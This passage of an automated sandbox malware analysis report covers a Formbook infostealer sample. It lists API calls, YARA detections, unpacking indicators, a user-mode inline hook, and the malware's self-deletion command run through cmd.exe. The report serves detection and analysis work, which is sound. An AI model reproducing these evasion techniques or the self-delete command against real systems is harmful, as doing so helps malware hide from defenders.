          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ACA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ACA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ACA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ACB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ACAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0242A060 NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0242A110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02429F30 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02429FE0 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0242A05A NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0242A10A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C82160
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C81790
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C8E7B8
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C85770
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C80FF0
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C850F8
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C82151
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C85108
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C85301
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C85310
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C80480
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C80479
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C85548
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C85558
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C81781
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C85760
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C84A69
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C84A78
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C84D69
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C83E80
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C83E71
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C80F48
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F309A0
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F3D288
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F39E14
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F30990
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F39850
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F35858
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F39840
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F35849
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F30012
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F373C0
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F373BD
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F35BA3
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F34BA2
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F30398
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F30389
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F35358
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F35348
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F35AF7
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F35AF8
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F34AC0
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F34ABF
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F30580
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F37584
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F30571
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F36D61
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F36D68
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F31497
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F31498
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F39C57
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F39C58
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F35C31
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F307C0
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F307B0
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F33720
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F39E83
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F39E65
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_0041E1CF
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_0041D23B
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_00402D87
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_00402D90
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_00409E40
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_0041D6CF
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_00402FB0
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_0041BFB6
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AA6E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABEBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A9B090
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B41002
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A9841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB2581
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A9D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A80D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AA4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8F900
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B51D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0242D23B
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0242E1CF
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02419E40
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02412FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0242BFB6
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02412D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02412D90
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 02A8B150 appears 32 times
          Source: GiG35Rwmz6.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: GiG35Rwmz6.exeBinary or memory string: OriginalFilename vs GiG35Rwmz6.exe
          Source: GiG35Rwmz6.exe, 00000000.00000002.679951755.0000000007EB0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs GiG35Rwmz6.exe
          Source: GiG35Rwmz6.exe, 00000000.00000000.661313043.00000000004A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIDispatch.exeH vs GiG35Rwmz6.exe
          Source: GiG35Rwmz6.exe, 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKygo.dll* vs GiG35Rwmz6.exe
          Source: GiG35Rwmz6.exe, 00000004.00000002.729162060.0000000000B56000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs GiG35Rwmz6.exe
          Source: GiG35Rwmz6.exe, 00000004.00000002.729465784.000000000108F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs GiG35Rwmz6.exe
          Source: GiG35Rwmz6.exe, 00000004.00000000.671606108.0000000000512000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIDispatch.exeH vs GiG35Rwmz6.exe
          Source: GiG35Rwmz6.exeBinary or memory string: OriginalFilenameIDispatch.exeH vs GiG35Rwmz6.exe
          Source: GiG35Rwmz6.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: GiG35Rwmz6.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@4/2
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GiG35Rwmz6.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_01
          Source: GiG35Rwmz6.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: GiG35Rwmz6.exeVirustotal: Detection: 40%
          Source: GiG35Rwmz6.exeReversingLabs: Detection: 34%
          Source: unknownProcess created: C:\Users\user\Desktop\GiG35Rwmz6.exe 'C:\Users\user\Desktop\GiG35Rwmz6.exe'
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess created: C:\Users\user\Desktop\GiG35Rwmz6.exe C:\Users\user\Desktop\GiG35Rwmz6.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\GiG35Rwmz6.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess created: C:\Users\user\Desktop\GiG35Rwmz6.exe C:\Users\user\Desktop\GiG35Rwmz6.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\GiG35Rwmz6.exe'
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: GiG35Rwmz6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: GiG35Rwmz6.exeStatic file information: File size 1116672 > 1048576
          Source: GiG35Rwmz6.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.692755022.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: GiG35Rwmz6.exe, 00000004.00000002.729465784.000000000108F000.00000040.00000001.sdmp, help.exe, 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: GiG35Rwmz6.exe, 00000004.00000002.729465784.000000000108F000.00000040.00000001.sdmp, help.exe
          Source: Binary string: help.pdbGCTL source: GiG35Rwmz6.exe, 00000004.00000002.729233616.0000000000F60000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: GiG35Rwmz6.exe, 00000004.00000002.729233616.0000000000F60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.692755022.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeUnpacked PE file: 0.2.GiG35Rwmz6.exe.3c0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeUnpacked PE file: 0.2.GiG35Rwmz6.exe.3c0000.0.unpack
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_003C5097 push ss; retf
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_003C4AEA push ebx; retf
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C8069A push FFFFFFBAh; retf
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C82DCF push ecx; retf
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_00C82DD9 push ecx; retf
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 0_2_09F3523A pushfd ; ret
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_0041E041 pushfd ; iretd
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_004170CB push edi; ret
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_00416888 push FFFFFFFAh; ret
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_00416C3E push ecx; retf
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_0041DD3C push cs; ret
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_0041DD82 push ebp; retf
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_00417628 push ds; iretd
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_00435097 push ss; retf
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_00434AEA push ebx; retf
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ADD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0242E041 pushfd ; iretd
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_024270CB push edi; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0242D0D2 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0242D0DB push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0242D085 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02426888 push FFFFFFFAh; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0242D13C push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02427628 push ds; iretd
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02426C3E push ecx; retf
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0242DD3C push cs; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0242DD82 push ebp; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.56086895782

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE7
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
